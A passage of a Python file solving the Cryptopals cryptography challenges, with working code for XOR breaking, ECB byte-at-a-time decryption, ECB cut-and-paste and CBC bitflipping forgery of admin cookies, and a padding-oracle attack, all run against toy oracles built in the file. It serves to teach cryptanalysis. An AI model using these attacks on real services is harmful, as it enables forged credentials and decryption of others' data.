Timing wrapper to log how long a method took to run.\n Example:\n @time_it\n def some_func():\n ...\n\n :param method: Expects to wrap a function\n :return:\n \"\"\"\n\n def wrapper(*args, **kw):\n startTime = int(round(time.time() * 1000))\n result = method(*args, **kw)\n endTime = int(round(time.time() * 1000))\n print(\"Function Name: {0} - {1}ms\".format(method.__name__, endTime - startTime))\n\n return result\n\n return wrapper\n\n\n@time_it\ndef challenge_01() -> None:\n input_string = \"49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d\"\n _hex = bytes.fromhex(\n input_string\n ) # b\"I'm killing your brain like a poisonous mushroom\"\n _b64 = binascii.b2a_base64(_hex).decode()\n\n assert (\n _b64.strip()\n == \"SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t\"\n )\n\n\n@time_it\ndef challenge_02() -> None:\n key = bytes.fromhex(\"686974207468652062756c6c277320657965\")\n message = bytes.fromhex(\"1c0111001f010100061a024b53535009181c\")\n\n decrypted = cryptopals.decrypt_xor(message, key) # b\"the kid don't play\"\n\n assert decrypted == bytes.fromhex(\"746865206b696420646f6e277420706c6179\")\n\n\n@time_it\ndef challenge_03() -> None:\n \"\"\"\n Single-byte XOR cipher\n The hex encoded string:\n\n 1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\n ... has been XOR'd against a single character. Find the key, decrypt the message.\n\n You can do this by hand. 
But don't: write code to do it for you.\n\n How?\n \"\"\"\n data = bytes.fromhex(\n \"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"\n )\n key, decrypted_message = cryptopals.find_key_and_decrypt_fixed_xor(data)\n assert decrypted_message == b\"Cooking MC's like a pound of bacon\"\n\n\n@time_it\ndef challenge_04() -> None:\n \"\"\"\n Detect single-character XOR\n One of the 60-character strings in this file has been encrypted by single-character XOR.\n\n Find it.\n\n (Your code from #3 should help.)\n \"\"\"\n\n with open(\"data/4.txt\", \"r\") as handle:\n for line in handle.readlines():\n line = binascii.a2b_hex(line.strip())\n\n key, decrypted = cryptopals.find_key_and_decrypt_fixed_xor(line)\n\n if cryptopals.english.part_of_language(decrypted):\n assert decrypted == b\"Now that the party is jumping\\n\"\n\n\n@time_it\ndef challenge_05() -> None:\n \"\"\"\n Implement repeating-key XOR\n Here is the opening stanza of an important work of the English language:\n\n Burning 'em, if you ain't quick and nimble\n I go crazy when I hear a cymbal\n Encrypt it, under the key \"ICE\", using repeating-key XOR.\n\n In repeating-key XOR, you'll sequentially apply each byte of the key;\n the first byte of plaintext will be XOR'd against I, the next C, the next E, then I again for the 4th byte, etc.\n\n It should come out to:\n\n 0b3637272a2b2e63622c2e69692a23693a2a3c6324202d623d63343c2a26226324272765272\n a282b2f20430a652e2c652a3124333a653e2b2027630c692b20283165286326302e27282f\n \"\"\"\n\n test = (\n b\"0b3637272a2b2e63622c2e69692a23693a2a3c6324202d623d63343c2a26226324272765272\"\n b\"a282b2f20430a652e2c652a3124333a653e2b2027630c692b20283165286326302e27282f\"\n )\n line = (\n b\"Burning 'em, if you ain't quick and nimble\\nI go crazy when I hear a cymbal\"\n )\n\n encrypt = cryptopals.encrypt_xor(line, b\"ICE\")\n assert encrypt == test\n\n\n@time_it\ndef challenge_06() -> None:\n \"\"\"\n Break repeating-key XOR\n :return:\n \"\"\"\n with open(\"data/6.txt\", \"r\") as handle:\n message = handle.read()\n\n # convert from base64 to bytes\n message = binascii.a2b_base64(message)\n\n result = cryptopals.break_repeating_key_xor(message)\n\n assert result == b\"Terminator X: Bring the noise\", result\n\n\n@time_it\ndef challenge_07() -> None:\n \"\"\"\n AES in ECB mode\n The Base64-encoded content in this file has been encrypted via AES-128 in ECB mode under the key\n\n \"YELLOW SUBMARINE\".\n (case-sensitive, without the quotes; exactly 16 characters; I like \"YELLOW SUBMARINE\" because it's exactly 16 bytes\n long, and now you do too).\n\n Decrypt it. 
You know the key, after all.\n\n Easiest way: use OpenSSL::Cipher and give it AES-128-ECB as the cipher.\n \"\"\"\n\n key = b\"YELLOW SUBMARINE\"\n\n with open(\"data/7.txt\", \"r\") as handle:\n text = binascii.a2b_base64(handle.read())\n\n result = cryptopals.decrypt_aes(text, key)\n\n lines = result.decode(\"utf-8\").split(\"\\n\")\n assert (\n lines[0] == \"I'm back and I'm ringin' the bell \"\n ), \"Decrypt AES Failed: {}\".format(lines[0])\n\n\n@time_it\ndef challenge_08() -> None:\n \"\"\"\n 8.txt contains a bunch of hex-encoded ciphertexts.\n - One of them has been encrypted with ECB.\n - Detect it.\n - The problem with ECB is that it is stateless and deterministic;\n - the same 16 byte plaintext block will always produce the same 16 byte ciphertext.\n \"\"\"\n\n ecb_encrypted_line = 132\n\n with open(\"data/8.txt\", \"r\") as handle:\n lines = handle.readlines()\n\n for index, line in enumerate(lines):\n text = bytes.fromhex(line.strip(\"\\n\"))\n\n if cryptopals.detect_ecb_use(text, 16):\n break\n\n assert ecb_encrypted_line == index\n\n\n@time_it\ndef challenge_09() -> None:\n text = b\"YELLOW SUBMARINE\"\n assert b\"YELLOW SUBMARINE\\x04\\x04\\x04\\x04\" == cryptopals.pkcs_7_padding(text, 20)\n\n\n@time_it\ndef challenge_10() -> None:\n \"\"\"\n CBC mode is a block cipher mode that allows us to encrypt irregularly-sized messages, despite the fact that a block\n cipher natively only transforms individual blocks. In CBC mode, each ciphertext block is added to the next\n plaintext block before the next call to the cipher core.\n\n The first plaintext block, which has no associated previous ciphertext block, is added to a\n \"fake 0th ciphertext block\" called the initialization vector, or IV.\n\n Implement CBC mode by hand by taking the ECB function you wrote earlier, making it encrypt instead of decrypt\n (verify this by decrypting whatever you encrypt to test), and using your XOR function from the previous exercise\n to combine them.\n\n The file is intelligible (somewhat) when CBC decrypted against \"YELLOW SUBMARINE\" with an IV of all ASCII 0\n (\\x00\\x00\\x00 &c)\n \"\"\"\n key = b\"YELLOW SUBMARINE\"\n iv = bytes([0] * 16)\n test_text = b\"this is my fancy text statement.\"\n encrypted = cryptopals.encrypt_aes(test_text, key)\n decrypted = cryptopals.decrypt_aes(encrypted, key)\n\n assert test_text == decrypted\n\n text = binascii.a2b_base64(open(\"data/10.txt\", \"r\").read())\n\n results = cryptopals.decrypt_aes_with_custom_cbc(text, key, iv)\n results = cryptopals.pkcs_7_padding_verification(b\"\".join(results))\n # print(b''.join(results))\n # print(results_stripped)\n\n blocks = cryptopals.encrypt_aes_with_custom_cbc(results, key, iv)\n\n assert text == b\"\".join(blocks), \"{}\".format(blocks)\n\n\n@time_it\ndef challenge_11() -> object:\n \"\"\"\n An ECB/CBC detection oracle\n Now that you have ECB and CBC working:\n\n Write a function to generate a random AES key; that's just 16 random bytes.\n\n Write a function that encrypts data under an unknown key --- that is, a function that generates a random key and\n encrypts under it.\n\n The function should look like:\n\n encryption_oracle(your-input)\n => [MEANINGLESS JIBBER JABBER]\n Under the hood, have the function append 5-10 bytes (count chosen randomly) before the plaintext and 5-10 bytes\n after the plaintext.\n\n Now, have the function choose to encrypt under ECB 1/2 the time, and under CBC the other half (just use random IVs\n each time for CBC). 
Use rand(2) to decide which to use.\n\n Detect the block cipher mode the function is using each time. You should end up with a piece of code that, pointed\n at a block box that might be encrypting ECB or CBC, tells you which one is happening.\n\n\n :return:\n \"\"\"\n\n def encrypt_oracle(text: bytes):\n random_aes_key = cryptopals.generate_random_bytes(16)\n prefix = cryptopals.generate_random_bytes(random.randint(5, 10))\n postfix = cryptopals.generate_random_bytes(random.randint(5, 10))\n\n message = b\"\".join([prefix, text, postfix])\n\n if random.randint(1, 2) == 2:\n encoding_type = \"ECB\"\n # encrypt ECB\n keysize = len(random_aes_key)\n text = cryptopals.pkcs_7_padding(text, keysize)\n blocks = [text[n : n + keysize] for n in range(0, len(text), keysize)]\n encrypted = []\n for block in blocks:\n text = cryptopals.encrypt_aes(block, random_aes_key)\n # print(binascii.hexlify(text))\n encrypted.append(text)\n else:\n # encrypt_CBC\n encoding_type = \"CBC\"\n random_iv = cryptopals.generate_random_bytes(16)\n encrypted = cryptopals.encrypt_aes_with_custom_cbc(\n message, random_aes_key, random_iv\n )\n\n return encrypted, encoding_type\n\n for x in range(10):\n test, is_ecb = encrypt_oracle(b\"A\" * 212)\n testing = b\"\".join(test)\n\n testing = binascii.hexlify(testing)\n assert (is_ecb == \"ECB\") == cryptopals.detect_ecb_use(testing, len(test[0]))\n # print(\"Content encrypted as {0}. Is ECB?: {1}\".format(is_ecb, detect_ecb_use(testing, len(test[0]))))\n\n # print(test)\n\n\n@time_it\ndef challenge_12() -> None:\n \"\"\"\n Byte - at - a - time\n\n ECB decryption(Simple)\n Copy your oracle function to a new function that encrypts buffers under ECB mode using a\n consistent but unknown key (for instance, assign a single random key, once, to a global variable).\n\n Now take that same function and have it append to the plaintext, BEFORE ENCRYPTING, the\n following string:\n\n Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK\n\n Spoiler alert. Do not decode this string now. Don't do it.\n\n Base64 decode the string before appending it. Do not base64\n decode the string by hand; make your code do it.The point is that you don't know its contents.\n\n What you have now is a function that produces:\n\n AES - 128 - ECB(your - string | | unknown - string, random - key)\n\n It turns out: you can decrypt \"unknown-string\" with repeated calls to the oracle function!\n\n Here's roughly how:\n\n Feed identical bytes of your-string to the function 1 at a time\n --- start with 1 byte (\"A\"), then \"AA\", then \"AAA\" and so on.\n\n 1. Discover the block size of the cipher. You know it, but do this step anyway\n 2. Detect that the function is using ECB. You already know, but do this step anyways.\n 3. Knowing the block size, craft an input block that is exactly 1 byte short (for instance, if the block size is\n 8 bytes, make \"AAAAAAA\"). Think about what the oracle function is going to put in that last byte position.\n 4. Make a dictionary of every possible last byte by feeding different strings to the oracle; for instance,\n \"AAAAAAAA\", \"AAAAAAAB\", \"AAAAAAAC\", remembering the first block of each invocation.\n 5. Match the output of the one-byte-short input to one of the entries in your dictionary. You've now discovered\n the first byte of unknown-string.\n 6. 
Repeat for the next byte.\n \"\"\"\n base64_encoded = (\n \"Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGll\"\n \"cyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK\"\n )\n base64_decoded = binascii.a2b_base64(\n base64_encoded\n ) # base64.b64decode(base64_encoded)\n random_aes_key = cryptopals.generate_random_bytes(16)\n\n encrypted_blocks = cryptopals.encrypt_ecb_oracle(\n b\"\", base64_decoded, random_aes_key\n )\n\n result = cryptopals.decrypt_ecb_message_without_key(\n encrypted_blocks, base64_decoded, random_aes_key\n )\n\n assert (\n result\n == b\"Rollin' in my 5.0\\nWith my rag-top down so my hair can blow\\nThe girlies on standby\"\n b\" waving just to say hi\\nDid you stop? No, I just drove by\\n\\x01\"\n ), \"Decryption Failed!\"\n\n\n@time_it\ndef challenge_13() -> None:\n \"\"\"\n ECB cut-and-paste\n\n :return:\n \"\"\"\n\n def profile_for(user_input: str):\n \"\"\"\n Now write a function that encodes a user profile in that format, given an email address.\n\n You should have something like:\n\n profile_for(\"foo@bar.com\")\n\n ... and it should produce:\n\n {\n email: 'foo@bar.com',\n uid: 10,\n role: 'user'\n }\n ... encoded as:\n\n email=foo@bar.com&uid=10&role=user\n Your \"profile_for\" function should not allow encoding metacharacters (& and =).\n Eat them, quote them, whatever you want to do,\n but don't let people set their email address to \"foo@bar.com&role=admin\".\n :return:\n \"\"\"\n\n # Eat illegals\n illegals = \"&=\"\n for illegal in illegals:\n user_input.replace(illegal, \"\")\n\n user_profile = collections.OrderedDict()\n user_profile[\"email\"] = user_input\n user_profile[\"uid\"] = 10\n user_profile[\"role\"] = \"user\"\n\n items = [\"{0}={1}\".format(k, v) for k, v in user_profile.items()]\n user_text = \"&\".join(items)\n\n return user_text\n\n email = (\n \"theadminisfake.test@gmail.\" + \"admin{}\".format(\"\\x11\" * 11) + \"com\"\n ) # necessary to push 'user' to its own line\n profile = profile_for(email)\n cookie = cryptopals.create_structured_cookie(profile)\n\n # print(cookie)\n\n \"\"\"\n Now, two more easy functions. 
Generate a random AES key, then:\n A.\tEncrypt the encoded user profile under the key; \"provide\" that to the \"attacker\".\n B.\tDecrypt the encoded user profile and parse it.\n\n Using only the user input to profile_for() (as an oracle to generate \"valid\" ciphertexts)\n and the ciphertexts themselves, make a role=admin profile.\n \"\"\"\n random_aes_key = cryptopals.generate_random_bytes(16)\n keysize = len(random_aes_key)\n message = cryptopals.pkcs_7_padding(profile.encode(), keysize)\n for_attacker = cryptopals.encrypt_aes(message, random_aes_key)\n\n # print(\"For Attacker: {}\".format(for_attacker))\n\n # to_be_swizzled = pkcs_7_padding(for_attacker, len(random_aes_key))\n to_be_swizzled = [\n for_attacker[n : n + keysize] for n in range(0, len(for_attacker), keysize)\n ]\n # Reorder the ECB Blocks and throw away the regular user account :)\n final = list()\n final.append(to_be_swizzled[0])\n final.append(to_be_swizzled[1])\n final.append(to_be_swizzled[3])\n final.append(to_be_swizzled[2])\n\n for_me = cryptopals.decrypt_aes(b\"\".join(final), random_aes_key)\n\n assert (\n for_me == b\"email=theadminisfake.test@gmail.com&uid=10&\"\n b\"role=admin\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n ), \"Admin account could not be hacked!\"\n\n\n@time_it\ndef challenge_14() -> object:\n \"\"\"\n Take your oracle function from #12. Now generate a random count of random bytes and prepend this string to every\n plaintext. You are now doing:\n\n AES-128-ECB(random-prefix || attacker-controlled || target-bytes, random-key)\n\n :return:\n \"\"\"\n\n base64_encoded = (\n \"Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGll\"\n \"cyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK\"\n )\n base64_decoded = binascii.a2b_base64(base64_encoded)\n random_aes_key = cryptopals.generate_random_bytes(16)\n random_prepend = cryptopals.generate_random_bytes(random.randint(1, 15))\n encrypted_blocks = cryptopals.encrypt_ecb_oracle(\n b\"\", base64_decoded, random_aes_key, prepend=random_prepend\n )\n\n # print(\"Padding: {}\".format(obtain_ecb_pkcs7_count(base64_decoded, random_aes_key, prepend=random_prepend)))\n cryptopals.obtain_ecb_prepend_padding_count(\n base64_decoded, random_aes_key, prepend=random_prepend\n )\n # print(decrypt_aes(b''.join(encrypted_blocks), random_aes_key))\n # print(\"Original Encrypted Blocks: {}\".format(len(encrypted_blocks)))\n\n result = cryptopals.decrypt_ecb_message_without_key(\n encrypted_blocks, base64_decoded, random_aes_key, prepend=random_prepend\n )\n assert base64_decoded == result.strip(\n b\"\\x01\"\n ), \"Decryption failed! 
{} != {}\".format(base64_decoded, result)\n\n\n@time_it\ndef challenge_15() -> None:\n tests = [\n b\"ICE ICE BABY\\x04\\x04\\x04\\x04\",\n b\"ICE ICE BABY\\x05\\x05\\x05\\x05\",\n b\"ICE ICE BABY\\x01\\x02\\x03\\x04\",\n b\"I\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\",\n b\"YELLOW SUBMARINE\",\n ]\n\n expected_results = [b\"ICE ICE BABY\", b\"I\", b\"YELLOW SUBMARINE\"]\n\n received_results = list()\n for test in tests:\n try:\n received_results.append(cryptopals.pkcs_7_padding_verification(test))\n except ValueError:\n pass\n\n for item in received_results:\n assert item in expected_results, \"PKCS7 Padding Verification Failed.\"\n\n\n@time_it\ndef challenge_16() -> None:\n \"\"\"\n CBC bitflipping attacks\n Generate a random AES key.\n\n Combine your padding code and CBC code to write two functions.\n\n The first function should take an arbitrary input string, prepend the string:\n\n \"comment1=cooking%20MCs;userdata=\"\n .. and append the string:\n\n \";comment2=%20like%20a%20pound%20of%20bacon\"\n The function should quote out the \";\" and \"=\" characters.\n\n The function should then pad out the input to the 16-byte AES block length and encrypt it under the random AES key.\n\n The second function should decrypt the string and look for the characters \";admin=true;\" (or, equivalently, decrypt,\n split the string on \";\", convert each resulting string into 2-tuples, and look for the \"admin\" tuple).\n\n Return true or false based on whether the string exists.\n\n If you've written the first function properly, it should not be possible to provide user input to it that will\n generate the string the second function is looking for. We'll have to break the crypto to do that.\n\n Instead, modify the ciphertext (without knowledge of the AES key) to accomplish this.\n\n You're relying on the fact that in CBC mode, a 1-bit error in a ciphertext block:\n\n Completely scrambles the block the error occurs in\n Produces the identical 1-bit error(/edit) in the next ciphertext block.\n Stop and think for a second.\n Before you implement this attack, answer this question: why does CBC mode have this property?\n :return:\n \"\"\"\n\n def encrypt_using_cbc(message, key):\n prepend = r\"comment1=cooking%20MCs;userdata=\"\n cleaned = message.replace(\";\", \"\").replace(\"=\", \"\")\n append = r\";comment2=%20like%20a%20pound%20of%20bacon\"\n\n full_message = \"{}{}{}\".format(prepend, cleaned, append).encode()\n\n encrypted = cryptopals.encrypt_aes_with_custom_cbc(\n full_message, key, b\"YELLOW SUBMARINE\"\n )\n\n return encrypted\n\n def is_admin(encrypted, random_aes_key):\n\n decrypted = cryptopals.decrypt_aes_with_custom_cbc(\n b\"\".join(encrypted), random_aes_key, b\"YELLOW SUBMARINE\"\n )\n # print('FUN: {}'.format(decrypted[2]))\n return False if b\"\".join(decrypted).find(b\";admin=true;\") == -1 else True\n\n random_aes_key = cryptopals.generate_random_bytes(16)\n encrypted = encrypt_using_cbc(\"?admin?true\", random_aes_key)\n\n # for debugging info\n # decrypted = decrypt_aes_with_custom_cbc(b''.join(encrypted), random_aes_key, b'YELLOW SUBMARINE')\n\n # do something here to make ;admin=true exist in encrypted.\n success = False\n for index in range(0, 255):\n first_array = bytearray(encrypted[1])\n first_array[0] = index\n for index2 in range(0, 255):\n first_array[6] = index2\n encrypted[1] = bytes(first_array)\n result = is_admin(encrypted, random_aes_key)\n if result:\n # print(\"Hacked Using the following byte Manipulations: {}, {}\".format(index, 
index2))\n success = True\n break\n if success:\n break\n\n assert success is True, \"Unable to hack admin gate!\"\n\n\n@time_it\ndef challenge_17():\n \"\"\"\n https://en.wikipedia.org/wiki/Padding_oracle_attack\n http://robertheaton.com/2013/07/29/padding-oracle-attack/\n\n :return:\n \"\"\"\n\n class Server:\n iv = cryptopals.generate_random_bytes(16)\n key = cryptopals.generate_random_bytes(16)\n test_data = [\n b\"MDAwMDAwTm93IHRoYXQgdGhlIHBhcnR5IGlzIGp1bXBpbmc =\",\n b\"MDAwMDAxV2l0aCB0aGUgYmFzcyBraWNrZWQgaW4gYW5kIHRoZSBWZWdhJ3MgYXJlIHB1bXBpbic =\",\n b\"MDAwMDAyUXVpY2sgdG8gdGhlIHBvaW50LCB0byB0aGUgcG9pbnQsIG5vIGZha2luZw ==\",\n b\"MDAwMDAzQ29va2luZyBNQydzIGxpa2UgYSBwb3VuZCBvZiBiYWNvbg ==\",\n b\"MDAwMDA0QnVybmluZyAnZW0sIGlmIHlvdSBhaW4ndCBxdWljayBhbmQgbmltYmxl\",\n b\"MDAwMDA1SSBnbyBjcmF6eSB3aGVuIEkgaGVhciBhIGN5bWJhbA ==\",\n b\"MDAwMDA2QW5kIGEgaGlnaCBoYXQgd2l0aCBhIHNvdXBlZCB1cCB0ZW1wbw ==\",\n b\"MDAwMDA3SSdtIG9uIGEgcm9sbCwgaXQncyB0aW1lIHRvIGdvIHNvbG8 =\",\n b\"MDAwMDA4b2xsaW4nIGluIG15IGZpdmUgcG9pbnQgb2g =\",\n b\"MDAwMDA5aXRoIG15IHJhZy10b3AgZG93biBzbyBteSBoYWlyIGNhbiBibG93\",\n ]\n\n def get_encrypted_blocks(self):\n # The first function should\n # - select at random one of ten strings\n # - generate a random AES key (which it should save for all future encryptions),\n # - pad the string out to the 16-byte AES block size and\n # - CBC-encrypt it under that key,\n # - providing the caller the ciphertext and IV.\n\n # grab a random string\n random_string = self.test_data[random.randrange(0, len(self.test_data))]\n\n print(\"-\" * 128)\n print(\"PRIOR TO ENCRYPTION: {}\".format(random_string))\n print(\"PRIOR TO ENCRBASE64: {}\".format(binascii.a2b_base64(random_string)))\n\n # encrypt using CBC\n encrypted_blocks = cryptopals.encrypt_aes_with_custom_cbc(\n random_string, self.key, self.iv\n )\n\n return encrypted_blocks\n\n def decrypt_cookie(self, ciphertext):\n # Consume the ciphertext\n # decrypt it,\n # check its padding, and\n # return true or false depending on whether the padding is valid.\n blocks = cryptopals.decrypt_aes_with_custom_cbc(\n ciphertext, self.key, self.iv\n )\n message = b\"\".join(blocks)\n # print(\"{} (Decrypted)\".format(message))\n\n try:\n cryptopals.pkcs_7_padding_verification(message)\n except ValueError:\n return False\n\n return True\n\n server = Server()\n blocks = server.get_encrypted_blocks()\n\n def side_channel_attack(c1, c2):\n byte_items = []\n results = []\n for slot in range(1, 17):\n # print(\"Working on byte {}\".format(17-slot))\n found = False\n\n prefix = b\"-\" * (16 - slot)\n postfix = b\"\"\n\n for counter, b1 in enumerate(byte_items, 1):\n postfix += bytes([b1 ^ slot])\n\n for index in range(0, 256):\n if found is False:\n c1a = prefix + bytes([index]) + postfix\n # print(c1a)\n assert len(c1a) == 16, \"Expected 16 bytes -- got {}\".format(\n len(c1a)\n )\n\n ciphertext = b\"\".join((c1a, c2))\n # print(ciphertext)\n if server.decrypt_cookie(ciphertext):\n \"\"\"\n Let b_{-1} be the last byte of C_{1}.\n\n The attacker changes it as follows:\n b_-1 = b_-1 XOR z1 XOR 0x01, where\n z_{-1} is the guessed value of the last byte of P_{2}.\n \"\"\"\n\n # intermediate state\n i2a = index ^ slot\n\n # plaintext reveal\n p2 = c1[-slot] ^ i2a\n\n # These are the bytes that make up the generated encryption block\n byte_items.insert(0, index ^ slot)\n\n # Decrypted Letters\n results.insert(0, p2)\n found = True\n # print(\"{} - Found ['{}']: hex {}, int {}\".format(17 - slot, chr(p2), c1a[-slot], c1a[-slot]))\n else:\n break\n\n if 
len(byte_items) != slot:\n print(\"[FAILED] Was unable to find byte {} ....\".format(17 - slot))\n final_results = [chr(result) for result in results]\n # print(\"STRING DECRYPTED: {}\".format((b'.' * (17-slot)) + ''.join(final_results).encode()))\n print(\"server key: {}\".format(server.key))\n print(\"server iv: {}\".format(server.iv))\n return ([69] * (18 - slot)) + results\n\n return results\n\n results = []\n blocks.insert(0, server.iv)\n for c1, c2 in zip(blocks, blocks[1:]):\n result = side_channel_attack(c1, c2)\n if result:\n results.append(\"\".join([chr(item) for item in result]))\n\n print(\"-\" * 128)\n print(\"DECRYPTED: {}\".format(results))\n print(\"DECBASE64: {}\".format(binascii.a2b_base64(\"\".join(results))))\n print(\"-\" * 128)\n\n\n@time_it\ndef challenge_18():\n \"\"\"\n key = YELLOW SUBMARINE\n nonce = 0\n format = 64 bit unsigned little endian nonce, 64 bit little endian block count(byte count / 16)\n \"\"\"\n\n key = b\"YELLOW SUBMARINE\"\n ctr_encrypted = (\n b\"L77na/nrFsKvynd6HzOoG7GHTLXsTVu9qvY/2syLXzhPweyyMTJULu/6/kXX0KSvoOLSFQ==\"\n )\n ctr_encrypted = binascii.a2b_base64(ctr_encrypted)\n\n decrypted = cryptopals.aes_with_custom_ctr(ctr_encrypted, key, nonce=0)\n\n assert (\n decrypted == b\"Yo, VIP Let's kick it Ice, Ice, baby Ice, Ice, baby \"\n ), \"CTR Decryption failed!\"\n\n\n@time_it\ndef challenge_19() -> None:\n \"\"\"\n Attack this cryptosystem piecemeal: guess letters, use expected English language frequence to validate guesses,\n catch common English trigrams, and so on.\n :return:\n \"\"\"\n lines = [\n \"SSBoYXZlIG1ldCB0aGVtIGF0IGNsb3NlIG9mIGRheQ==\",\n \"Q29taW5nIHdpdGggdml2aWQgZmFjZXM=\",\n \"RnJvbSBjb3VudGVyIG9yIGRlc2sgYW1vbmcgZ3JleQ==\",\n \"RWlnaHRlZW50aC1jZW50dXJ5IGhvdXNlcy4=\",\n \"SSBoYXZlIHBhc3NlZCB3aXRoIGEgbm9kIG9mIHRoZSBoZWFk\",\n \"T3IgcG9saXRlIG1lYW5pbmdsZXNzIHdvcmRzLA==\",\n \"T3IgaGF2ZSBsaW5nZXJlZCBhd2hpbGUgYW5kIHNhaWQ=\",\n \"UG9saXRlIG1lYW5pbmdsZXNzIHdvcmRzLA==\",\n \"QW5kIHRob3VnaHQgYmVmb3JlIEkgaGFkIGRvbmU=\",\n \"T2YgYSBtb2NraW5nIHRhbGUgb3IgYSBnaWJl\",\n \"VG8gcGxlYXNlIGEgY29tcGFuaW9u\",\n \"QXJvdW5kIHRoZSBmaXJlIGF0IHRoZSBjbHViLA==\",\n \"QmVpbmcgY2VydGFpbiB0aGF0IHRoZXkgYW5kIEk=\",\n \"QnV0IGxpdmVkIHdoZXJlIG1vdGxleSBpcyB3b3JuOg==\",\n \"QWxsIGNoYW5nZWQsIGNoYW5nZWQgdXR0ZXJseTo=\",\n \"QSB0ZXJyaWJsZSBiZWF1dHkgaXMgYm9ybi4=\",\n \"VGhhdCB3b21hbidzIGRheXMgd2VyZSBzcGVudA==\",\n \"SW4gaWdub3JhbnQgZ29vZCB3aWxsLA==\",\n \"SGVyIG5pZ2h0cyBpbiBhcmd1bWVudA==\",\n \"VW50aWwgaGVyIHZvaWNlIGdyZXcgc2hyaWxsLg==\",\n \"V2hhdCB2b2ljZSBtb3JlIHN3ZWV0IHRoYW4gaGVycw==\",\n \"V2hlbiB5b3VuZyBhbmQgYmVhdXRpZnVsLA==\",\n \"U2hlIHJvZGUgdG8gaGFycmllcnM/\",\n \"VGhpcyBtYW4gaGFkIGtlcHQgYSBzY2hvb2w=\",\n \"QW5kIHJvZGUgb3VyIHdpbmdlZCBob3JzZS4=\",\n \"VGhpcyBvdGhlciBoaXMgaGVscGVyIGFuZCBmcmllbmQ=\",\n \"V2FzIGNvbWluZyBpbnRvIGhpcyBmb3JjZTs=\",\n \"SGUgbWlnaHQgaGF2ZSB3b24gZmFtZSBpbiB0aGUgZW5kLA==\",\n \"U28gc2Vuc2l0aXZlIGhpcyBuYXR1cmUgc2VlbWVkLA==\",\n \"U28gZGFyaW5nIGFuZCBzd2VldCBoaXMgdGhvdWdodC4=\",\n \"VGhpcyBvdGhlciBtYW4gSSBoYWQgZHJlYW1lZA==\",\n \"QSBkcnVua2VuLCB2YWluLWdsb3Jpb3VzIGxvdXQu\",\n \"SGUgaGFkIGRvbmUgbW9zdCBiaXR0ZXIgd3Jvbmc=\",\n \"VG8gc29tZSB3aG8gYXJlIG5lYXIgbXkgaGVhcnQs\",\n \"WWV0IEkgbnVtYmVyIGhpbSBpbiB0aGUgc29uZzs=\",\n \"SGUsIHRvbywgaGFzIHJlc2lnbmVkIGhpcyBwYXJ0\",\n \"SW4gdGhlIGNhc3VhbCBjb21lZHk7\",\n \"SGUsIHRvbywgaGFzIGJlZW4gY2hhbmdlZCBpbiBoaXMgdHVybiw=\",\n \"VHJhbnNmb3JtZWQgdXR0ZXJseTo=\",\n \"QSB0ZXJyaWJsZSBiZWF1dHkgaXMgYm9ybi4=\",\n ]\n\n # Generate a random key and encrypt the above base64 text\n random_key = 
cryptopals.generate_random_bytes(16)\n encrypted_messages = []\n for item in lines:\n message = binascii.a2b_base64(item)\n encrypted = cryptopals.aes_with_custom_ctr(message, random_key, nonce=0)\n encrypted_messages.append(encrypted)\n\n \"\"\"\n foo_BYTE XOR bar_BYTE = KEYSTREAM-BYTE\n And since the keystream is the same for every ciphertext:\n foo-BYTE XOR KEYSTREAM-BYTE = bar-BYTE\n \"\"\"\n key = []\n max_line_length = len(max(encrypted_messages, key=len))\n for index in range(0, max_line_length):\n scores = {}\n for guess in range(256):\n\n items = [\n chr(message[index] ^ guess)\n for message in encrypted_messages\n if len(message) > index\n ]\n score = cryptopals.english.score_text(\"\".join(items).encode())\n scores[guess] = score\n\n high_score = max(scores, key=lambda x: scores[x])\n if high_score > 0:\n key.append(bytes([high_score]))\n\n test_total_decrypt = []\n final_key = b\"\".join(key)\n keysize = len(final_key)\n for line, message in zip(lines, encrypted_messages):\n blocks = [message[n : n + keysize] for n in range(0, len(message), keysize)]\n decrypt = [cryptopals.decrypt_xor(block, final_key) for block in blocks]\n\n test_total_decrypt.append(\n cryptopals.compute_hamming_distance(\n b\"\".join(decrypt), binascii.a2b_base64(line)\n )\n )\n\n normalized_distance = sum(test_total_decrypt) / len(test_total_decrypt)\n assert (\n normalized_distance < 5\n ), \"Hamming Distance of {} suggests decryption failed.\".format(normalized_distance)\n # print(f\"Decrypted with a Hamming Distance from known clear text of {normalized_distance}\")\n\n\n@time_it\ndef challenge_20() -> None:\n \"\"\"\n Using 20.txt, find a similar set of Base64'd plaintext. Do with them exactly what you did with the first, but\n solve the problem differently. Instead of making spot guesses at to known plaintext, treat the collection of\n ciphertexts the same way you would repeating-key XOR.\n\n Obviously, CTR encryption appears different from repeated-ke XOR, but with a fixed nonce they are effectively\n the same thing.\n\n To exploit this:\n 1. take your collection of ciphertexts and\n 2. 
